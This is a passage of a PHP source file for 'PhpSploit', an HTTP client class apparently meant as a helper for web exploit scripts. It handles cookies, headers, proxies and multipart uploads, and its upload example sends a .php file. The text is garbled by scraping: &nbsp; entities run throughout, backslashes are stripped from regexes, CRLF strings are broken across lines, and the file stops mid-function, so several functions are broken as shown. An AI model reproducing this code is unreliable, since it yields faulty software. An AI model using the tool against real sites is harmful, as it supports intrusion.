&nbsp;*&nbsp;You&nbsp;should&nbsp;have&nbsp;received&nbsp;a&nbsp;copy&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;
&nbsp;*&nbsp;along&nbsp;with&nbsp;this&nbsp;program;&nbsp;if&nbsp;not,&nbsp;write&nbsp;to&nbsp;the&nbsp;Free&nbsp;Software&nbsp;
&nbsp;*&nbsp;Foundation,&nbsp;Inc.,&nbsp;59&nbsp;Temple&nbsp;Place&nbsp;-&nbsp;Suite&nbsp;330,&nbsp;Boston,&nbsp;MA&nbsp;&nbsp;02111-1307,&nbsp;USA.
&nbsp;*&nbsp;
&nbsp;*&nbsp;TITLE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PhpSploit&nbsp;Class
&nbsp;*&nbsp;REQUIREMENTS:&nbsp;&nbsp;&nbsp;PHP&nbsp;5&nbsp;(remove&nbsp;\"private\",&nbsp;\"public\"&nbsp;if&nbsp;you&nbsp;have&nbsp;PHP&nbsp;4)
&nbsp;*&nbsp;VERSION:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1.2
&nbsp;*&nbsp;LICENSE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License
&nbsp;*&nbsp;ORIGINAL&nbsp;URL:&nbsp;&nbsp;&nbsp;http://www.acid-root.new.fr/tools/03061230.txt
&nbsp;*&nbsp;FILENAME:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;phpsploitclass.php
&nbsp;*
&nbsp;*&nbsp;CONTACT:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[email protected]&nbsp;(french&nbsp;/&nbsp;english)
&nbsp;*&nbsp;GREETZ:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sparah,&nbsp;Ddx39
&nbsp;*
&nbsp;*&nbsp;DESCRIPTION:
&nbsp;*&nbsp;The&nbsp;phpsploit&nbsp;is&nbsp;a&nbsp;class&nbsp;implementing&nbsp;a&nbsp;web&nbsp;user&nbsp;agent.
&nbsp;*&nbsp;You&nbsp;can&nbsp;add&nbsp;cookies,&nbsp;headers,&nbsp;use&nbsp;a&nbsp;proxy&nbsp;server&nbsp;with&nbsp;(or&nbsp;without)&nbsp;a
&nbsp;*&nbsp;basic&nbsp;authentification.&nbsp;It&nbsp;supports&nbsp;the&nbsp;GET&nbsp;and&nbsp;the&nbsp;POST&nbsp;method.&nbsp;It&nbsp;can
&nbsp;*&nbsp;also&nbsp;be&nbsp;used&nbsp;like&nbsp;a&nbsp;browser&nbsp;with&nbsp;the&nbsp;cookiejar()&nbsp;function&nbsp;(which&nbsp;allow
&nbsp;*&nbsp;a&nbsp;server&nbsp;to&nbsp;add&nbsp;several&nbsp;cookies&nbsp;for&nbsp;the&nbsp;next&nbsp;requests)&nbsp;and&nbsp;the
&nbsp;*&nbsp;allowredirection()&nbsp;function&nbsp;(which&nbsp;allow&nbsp;the&nbsp;script&nbsp;to&nbsp;follow&nbsp;all
&nbsp;*&nbsp;redirections&nbsp;sent&nbsp;by&nbsp;the&nbsp;server).&nbsp;It&nbsp;can&nbsp;return&nbsp;the&nbsp;content&nbsp;(or&nbsp;the
&nbsp;*&nbsp;headers)&nbsp;of&nbsp;the&nbsp;request.&nbsp;Others&nbsp;useful&nbsp;functions&nbsp;can&nbsp;be&nbsp;used&nbsp;for&nbsp;debugging.
&nbsp;*&nbsp;A&nbsp;manual&nbsp;is&nbsp;actually&nbsp;in&nbsp;development&nbsp;but&nbsp;to&nbsp;know&nbsp;how&nbsp;to&nbsp;use&nbsp;it,&nbsp;you&nbsp;can
&nbsp;*&nbsp;read&nbsp;the&nbsp;comments.
&nbsp;*
&nbsp;*&nbsp;CHANGELOG:
&nbsp;*&nbsp;[2007-01-24]&nbsp;(1.2)
&nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#2&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;getcookie()&nbsp;function&nbsp;((|;))
&nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;multipart/form-data&nbsp;enctype&nbsp;is&nbsp;now&nbsp;supported&nbsp;
&nbsp;*
&nbsp;*&nbsp;[2006-12-31]&nbsp;(1.1)
&nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#1&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;allowredirection()&nbsp;function&nbsp;(chr(13)&nbsp;bug)
&nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;You&nbsp;can&nbsp;now&nbsp;call&nbsp;the&nbsp;getheader()&nbsp;/&nbsp;getcontent()&nbsp;function&nbsp;without&nbsp;parameters
&nbsp;*
&nbsp;*&nbsp;[2006-12-30]&nbsp;(1.0)
&nbsp;*&nbsp;&nbsp;*&nbsp;First&nbsp;version
&nbsp;*&nbsp;
&nbsp;*/

class&nbsp;phpsploit&nbsp;{

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;get()/post()&nbsp;functions.
	&nbsp;*&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it,&nbsp;this&nbsp;is&nbsp;the&nbsp;main&nbsp;function.
	&nbsp;*
	&nbsp;*&nbsp;@return&nbsp;$server_response
	&nbsp;*/
	private&nbsp;function&nbsp;sock()
	{
		if(!empty($this->proxyhost)&nbsp;&&&nbsp;!empty($this->proxyport))&nbsp;$socket&nbsp;=&nbsp;fsockopen($this->proxyhost,$this->proxyport);
		else&nbsp;$socket&nbsp;=&nbsp;fsockopen($this->host,$this->port);
		
		if(!$socket)&nbsp;die(\"Error:&nbsp;The&nbsp;host&nbsp;doesn\'t&nbsp;exist\");
		
		if($this->method===\"get\")&nbsp;$this->packet&nbsp;=&nbsp;\"GET&nbsp;\".$this->url.\"&nbsp;HTTP/1.1
\";
		elseif($this->method===\"post\"&nbsp;or&nbsp;$this->method===\"formdata\")&nbsp;$this->packet&nbsp;=&nbsp;\"POST&nbsp;\".$this->url.&nbsp;\"&nbsp;HTTP/1.1
\";
		else&nbsp;die(\"Error:&nbsp;Invalid&nbsp;method\");
		
		if(!empty($this->proxyuser))&nbsp;$this->packet&nbsp;.=&nbsp;\"Proxy-Authorization:&nbsp;Basic&nbsp;\".base64_encode($this->proxyuser.\":\".$this->proxypass).\"
\";
		$this->packet&nbsp;.=&nbsp;\"Host:&nbsp;\".$this->host.\"
\";
		
		if(!empty($this->agent))&nbsp;&nbsp;$this->packet&nbsp;.=&nbsp;\"User-Agent:&nbsp;\".$this->agent.\"
\";
		if(!empty($this->header))&nbsp;$this->packet&nbsp;.=&nbsp;$this->header.\"
\";
		if(!empty($this->cookie))&nbsp;$this->packet&nbsp;.=&nbsp;\"Cookie:&nbsp;\".$this->cookie.\"
\";
		
		$this->packet&nbsp;.=&nbsp;\"Connection:&nbsp;Close
\";
		if($this->method===\"post\")
		{
			$this->packet&nbsp;.=&nbsp;\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
			$this->packet&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($this->data).\"

\";
			$this->packet&nbsp;.=&nbsp;$this->data.\"
\";
		}
		elseif($this->method===\"formdata\")
		{
			$this->packet&nbsp;.=&nbsp;\"Content-Type:&nbsp;multipart/form-data;&nbsp;boundary=---------------------------\".$this->boundary.\"
\";
			$this->packet&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($this->data).\"

\";
			$this->packet&nbsp;.=&nbsp;$this->data;
		}
		$this->packet&nbsp;.=&nbsp;\"
\";
		$this->recv&nbsp;=&nbsp;\'\';
		
		fputs($socket,$this->packet);
		while(!feof($socket))&nbsp;$this->recv&nbsp;.=&nbsp;fgets($socket);
		fclose($socket);
		
		if($this->cookiejar)&nbsp;$this->cookiejar($this->getheader($this->recv));
		if($this->allowredirection)&nbsp;return&nbsp;$this->allowredirection($this->recv);
		else&nbsp;return&nbsp;$this->recv;
	}
	

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;add&nbsp;several&nbsp;cookie&nbsp;in&nbsp;the
	&nbsp;*&nbsp;request.&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->addcookie(\"name\",\"value\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addcookie(\"name=newvalue\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addcookie(\"othername=overvalue;&nbsp;xx=zz;&nbsp;y=u\");
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$cookiename
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$cookievalue
	&nbsp;*&nbsp;
	&nbsp;*/
	public&nbsp;function&nbsp;addcookie($cookn,$cookv=\'\')
	{
		//&nbsp;$this->addcookie(\"name\",\"value\");&nbsp;work&nbsp;avec&nbsp;replace
		if(!empty($cookv))
		{
			if($cookv&nbsp;===&nbsp;\"deleted\")&nbsp;$cookv=\'\';&nbsp;//&nbsp;cookiejar(1)&nbsp;&&&nbsp;Set-Cookie:&nbsp;name=delete
			if(!empty($this->cookie))
			{
			&nbsp;&nbsp;&nbsp;&nbsp;if(preg_match(\"/$cookn=/\",$this->cookie))
			&nbsp;&nbsp;&nbsp;&nbsp;{
			&nbsp;&nbsp;&nbsp;&nbsp;	$this->cookie&nbsp;=&nbsp;preg_replace(\"/$cookn=(S*);/\",\"$cookn=$cookv;\",$this->cookie);
			&nbsp;&nbsp;&nbsp;&nbsp;}
			&nbsp;&nbsp;&nbsp;&nbsp;else
			&nbsp;&nbsp;&nbsp;&nbsp;{
			&nbsp;&nbsp;&nbsp;&nbsp;	$this->cookie&nbsp;.=&nbsp;\"&nbsp;\".$cookn.\"=\".$cookv.\";\";&nbsp;//&nbsp;\"&nbsp;\".
			&nbsp;&nbsp;&nbsp;&nbsp;}
			}
			else
			{
				$this->cookie&nbsp;=&nbsp;$cookn.\"=\".$cookv.\";\";
			}
		}
		//&nbsp;$this->addcookie(\"name=value;&nbsp;othername=othervalue\");
		else
		{
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;if(!empty($this->cookie))
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;{
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	$cookn&nbsp;=&nbsp;preg_replace(\"/(.*);$/\",\"$1\",$cookn);
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	$cookarr&nbsp;=&nbsp;explode(\";\",str_replace(\"&nbsp;\",&nbsp;\"\",$cookn));
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	for($i=0;$i<count($cookarr);$i++)
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	{
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;		preg_match(\"/(S*)=(S*)/\",$cookarr[$i],$matches);
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;		$cookn&nbsp;=&nbsp;$matches[1];
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;		$cookv&nbsp;=&nbsp;$matches[2];
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;		$this->addcookie($cookn,$cookv);
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	}
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;}
			&nbsp;else
			&nbsp;{
			&nbsp;	$cookn&nbsp;=&nbsp;((substr($cookn,(strlen($cookn)-1),1))===\";\")&nbsp;?&nbsp;$cookn&nbsp;:&nbsp;$cookn.\";\";
			&nbsp;	$this->cookie&nbsp;=&nbsp;$cookn;			
			&nbsp;}
		}
	}
	
	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;add&nbsp;several&nbsp;headers&nbsp;in&nbsp;the
	&nbsp;*&nbsp;request.&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported:
	&nbsp;*
	&nbsp;*&nbsp;$this->addheader(\"headername\",\"headervalue\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addheader(\"headername:&nbsp;headervalue\");
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$headername
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$headervalue
	&nbsp;*/
	public&nbsp;function&nbsp;addheader($headern,$headervalue=\'\')
	{
		//&nbsp;$this->addheader(\"name\",\"value\");
		if(!empty($headervalue))
		{
			if(!empty($this->header))
			{
				if(preg_match(\"/$headern:/\",$this->header))
				{
					$this->header&nbsp;=&nbsp;preg_replace(\"/$headern:&nbsp;(S*)/\",\"$headern:&nbsp;$headervalue\",$this->header);
				}
				else
				{
					$this->header&nbsp;.=&nbsp;\"
\".$headern.\":&nbsp;\".$headervalue;
				}
			}
			else
			{
				$this->header=$headern.\":&nbsp;\".$headervalue;
			}
		}
		//&nbsp;$this->addheader(\"name:&nbsp;value\");
		else&nbsp;
		{
			if(!empty($this->header))
			{
				$headarr&nbsp;=&nbsp;explode(\":&nbsp;\",$headern);
				$headern&nbsp;=&nbsp;$headarr[0];
				$headerv&nbsp;=&nbsp;$headarr[1];
				$this->addheader($headern,$headerv);
			}
			else
			{
				$this->header=$headern;
			}
		}
	}
	

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;use&nbsp;an&nbsp;http&nbsp;proxy&nbsp;server.
	&nbsp;*&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->proxy(\"proxyip\",\"8118\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->proxy(\"proxyip:8118\")
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxyhost
	&nbsp;*&nbsp;@param&nbsp;integer&nbsp;$proxyport
	&nbsp;*/
	public&nbsp;function&nbsp;proxy($proxy,$proxyp=\'\')
	{
		//&nbsp;$this->proxy(\"localhost:8118\");
		if(empty($proxyp))
		{
			preg_match(\"/^(S*):(d+)$/\",$proxy,$proxarr);
			$proxh&nbsp;=&nbsp;$proxarr[1];
			$proxp&nbsp;=&nbsp;$proxarr[2];
			$this->proxyhost=$proxh;
			$this->proxyport=$proxp;
		}
		//&nbsp;$this->proxy(\"localhost\",8118);
		else&nbsp;
		{
			$this->proxyhost=$proxy;
			$this->proxyport=intval($proxyp);
		}
		if($this->proxyport&nbsp;>&nbsp;65535)&nbsp;die(\"Error:&nbsp;Invalid&nbsp;port&nbsp;number\");
	}
	

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;use&nbsp;an&nbsp;http&nbsp;proxy&nbsp;server
	&nbsp;*&nbsp;which&nbsp;requires&nbsp;a&nbsp;basic&nbsp;authentification.&nbsp;Several
	&nbsp;*&nbsp;methods&nbsp;are&nbsp;supported:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->proxyauth(\"darkfig\",\"dapasswd\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->proxyauth(\"darkfig:dapasswd\");
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxyuser
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxypass
	&nbsp;*/
	public&nbsp;function&nbsp;proxyauth($proxyauth,$proxypasse=\'\')
	{
		//&nbsp;$this->proxyauth(\"darkfig:password\");
		if(empty($proxypasse))
		{
			preg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);
			$proxu&nbsp;=&nbsp;$proxautharr[1];
			$proxp&nbsp;=&nbsp;$proxautharr[2];
			$this->proxyuser=$proxu;
			$this->proxypass=$proxp;
		}
		//&nbsp;$this->proxyauth(\"darkfig\",\"password\");
		else
		{
			$this->proxyuser=$proxyauth;
			$this->proxypass=$proxypasse;
		}
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;set&nbsp;the&nbsp;\"User-Agent\"&nbsp;header.
	&nbsp;*&nbsp;Several&nbsp;methods&nbsp;are&nbsp;possible&nbsp;to&nbsp;do&nbsp;that:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->agent(\"Mozilla&nbsp;Firefox\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addheader(\"User-Agent:&nbsp;Mozilla&nbsp;Firefox\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addheader(\"User-Agent\",\"Mozilla&nbsp;Firefox\");
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$useragent
	&nbsp;*/
	public&nbsp;function&nbsp;agent($useragent)
	{
		$this->agent=$useragent;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;header&nbsp;which&nbsp;will&nbsp;be
	&nbsp;*&nbsp;in&nbsp;the&nbsp;next&nbsp;request.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->showheader();
	&nbsp;*
	&nbsp;*&nbsp;@return&nbsp;$header
	&nbsp;*/
	public&nbsp;function&nbsp;showheader()
	{
		return&nbsp;$this->header;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;cookie&nbsp;which&nbsp;will&nbsp;be
	&nbsp;*&nbsp;in&nbsp;the&nbsp;next&nbsp;request.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->showcookie();
	&nbsp;*
	&nbsp;*&nbsp;@return&nbsp;$storedcookies
	&nbsp;*/
	public&nbsp;function&nbsp;showcookie()
	{
		return&nbsp;$this->cookie;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;last&nbsp;formed
	&nbsp;*&nbsp;http&nbsp;request&nbsp;(the&nbsp;http&nbsp;packet).
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->showlastrequest();
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@return&nbsp;$last_http_request
	&nbsp;*/
	public&nbsp;function&nbsp;showlastrequest()
	{
		return&nbsp;$this->packet;
	}
	
	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the
	&nbsp;*&nbsp;GET&nbsp;method.&nbsp;You&nbsp;can&nbsp;precise&nbsp;the&nbsp;port&nbsp;of&nbsp;the&nbsp;host.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->get(\"http://localhost\");
	&nbsp;*&nbsp;$this->get(\"http://localhost:888/xd/tst.php\");
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$urlwithpath
	&nbsp;*&nbsp;@return&nbsp;$server_response
	&nbsp;*/
	public&nbsp;function&nbsp;get($url)
	{
		$this->target($url);
		$this->method=\"get\";
		return&nbsp;$this->sock();
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the
	&nbsp;*&nbsp;POST&nbsp;method.&nbsp;You&nbsp;can&nbsp;precise&nbsp;the&nbsp;port&nbsp;of&nbsp;the&nbsp;host.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$urlwithpath
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$postdata
	&nbsp;*&nbsp;@return&nbsp;$server_response
	&nbsp;*/	
	public&nbsp;function&nbsp;post($url,$data)
	{
		$this->target($url);
		$this->method=\"post\";
		$this->data=$data;
		return&nbsp;$this->sock();
	}
	

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;sends&nbsp;the&nbsp;formed&nbsp;http&nbsp;packet&nbsp;with&nbsp;the
	&nbsp;*&nbsp;POST&nbsp;method&nbsp;using&nbsp;the&nbsp;multipart/form-data&nbsp;enctype.&nbsp;
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$array&nbsp;=&nbsp;array(
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_url&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\"http://localhost/upload.php\",
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_boundary&nbsp;=>&nbsp;\"123456\",&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Optional
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"email\"&nbsp;=>&nbsp;\"[email protected]\",
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\"varname\"&nbsp;=>&nbsp;array(
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_type&nbsp;=>&nbsp;\"image/gif\",&nbsp;&nbsp;&nbsp;#&nbsp;Optional
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_transfert&nbsp;=>&nbsp;\"binary\",&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Optional
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_filename&nbsp;=>&nbsp;\"hello.php\",
	&nbsp;*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;frmdt_content&nbsp;=>&nbsp;\"<?php&nbsp;echo&nbsp;\':)\';&nbsp;?>\"));
	&nbsp;*&nbsp;$this->formdata($array);
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;array&nbsp;$array
	&nbsp;*&nbsp;@return&nbsp;$server_response
	&nbsp;*/
	public&nbsp;function&nbsp;formdata($array)
	{
		$this->target($array[frmdt_url]);
		$this->method=\"formdata\";
		$this->data=\'\';
		if(!isset($array[frmdt_boundary]))&nbsp;$this->boundary=\"phpsploit\";
		else&nbsp;$this->boundary=$array[frmdt_boundary];
		foreach($array&nbsp;as&nbsp;$key&nbsp;=>&nbsp;$value)
		{
			if(!preg_match(\"#^frmdt_(boundary|url)#\",$key))
			{
				$this->data&nbsp;.=&nbsp;\"-----------------------------\".$this->boundary.\"
\";
				$this->data&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\"\".$key.\"\";\";
				if(!is_array($value))
				{
					$this->data&nbsp;.=&nbsp;\"

\".$value.\"
\";
				}
				else
				{
					$this->data&nbsp;.=&nbsp;\"&nbsp;filename=\"\".$array[$key][frmdt_filename].\"\";
\";
					if(isset($array[$key][frmdt_type]))&nbsp;$this->data&nbsp;.=&nbsp;\"Content-Type:&nbsp;\".$array[$key][frmdt_type].\"
\";
					if(isset($array[$key][frmdt_transfert]))&nbsp;$this->data&nbsp;.=&nbsp;\"Content-Transfer-Encoding:&nbsp;\".$array[$key][frmdt_transfert].\"
\";
					$this->data&nbsp;.=&nbsp;\"
\".$array[$key][frmdt_content].\"
\";
				}
			}
		}
		$this->data&nbsp;.=&nbsp;\"-----------------------------\".$this->boundary.\"--
\";
		return&nbsp;$this->sock();
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;content&nbsp;of&nbsp;the&nbsp;server&nbsp;response
	&nbsp;*&nbsp;without&nbsp;the&nbsp;headers.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->getcontent($this->get(\"http://localhost/\"));
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->getcontent();
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response
	&nbsp;*&nbsp;@return&nbsp;$onlythecontent
	&nbsp;*/
	public&nbsp;function&nbsp;getcontent($code=\'\')
	{
		if(empty($code))&nbsp;$code&nbsp;=&nbsp;$this->recv;
		$content&nbsp;=&nbsp;explode(\"
\",$code);
		$onlycode&nbsp;=&nbsp;\'\';
		for($i=1;$i<count($content);$i++)
		{
			if(!preg_match(\"/^(S*):/\",$content[$i]))&nbsp;$ok&nbsp;=&nbsp;1;
			if($ok)&nbsp;$onlycode&nbsp;.=&nbsp;$content[$i].\"
\";
		}
		return&nbsp;$onlycode;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;returns&nbsp;the&nbsp;headers&nbsp;of&nbsp;the&nbsp;server&nbsp;response
	&nbsp;*&nbsp;without&nbsp;the&nbsp;content.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->getheader();
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response
	&nbsp;*&nbsp;@return&nbsp;$onlytheheaders
	&nbsp;*/
	public&nbsp;function&nbsp;getheader($code=\'\')
	{
		if(empty($code))&nbsp;$code&nbsp;=&nbsp;$this->recv;
		$header&nbsp;=&nbsp;explode(\"
\",$code);
		$onlyheader&nbsp;=&nbsp;$header[0].\"
\";
		for($i=1;$i<count($header);$i++)
		{
			if(!preg_match(\"/^(S*):/\",$header[$i]))&nbsp;break;
			$onlyheader&nbsp;.=&nbsp;$header[$i].\"
\";
		}
		return&nbsp;$onlyheader;
	}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;cookiejar()&nbsp;function.
	&nbsp;*&nbsp;It&nbsp;adds&nbsp;the&nbsp;value&nbsp;of&nbsp;the&nbsp;\"Set-Cookie\"&nbsp;header&nbsp;in&nbsp;the&nbsp;\"Cookie\"
	&nbsp;*&nbsp;header&nbsp;for&nbsp;the&nbsp;next&nbsp;request.&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$server_response
	&nbsp;*/
	private&nbsp;function&nbsp;getcookie($code)
	{
		$carr&nbsp;=&nbsp;explode(\"
\",str_replace(\"
\",\"
\",$code));
		for($z=0;$z<count($carr);$z++)
		{
			if(preg_match(\"/set-cookie:&nbsp;(.*)/i\",$carr[$z],$cookarr))
			{
				$cookie[]&nbsp;=&nbsp;preg_replace(\"/expires=(.*)(GMT||UTC)(S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));
			}
		}

		for($i=0;$i<count($cookie);$i++)
		{
			preg_match(\"/(S*)=(S*)(|;)/\",$cookie[$i],$matches);
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cookn&nbsp;=&nbsp;$matches[1];
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cookv&nbsp;=&nbsp;$matches[2];
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->addcookie($cookn,$cookv);
		}
&nbsp;&nbsp;&nbsp;&nbsp;}

	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;get()/post()&nbsp;functions.
	&nbsp;*&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it.
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$urltarg
	&nbsp;*/
	private&nbsp;function&nbsp;target($urltarg)
	{
		if(!preg_match(\"/^http://(.*)//\",$urltarg))&nbsp;$urltarg&nbsp;.=&nbsp;\"/\";
		$this->url=$urltarg;
		
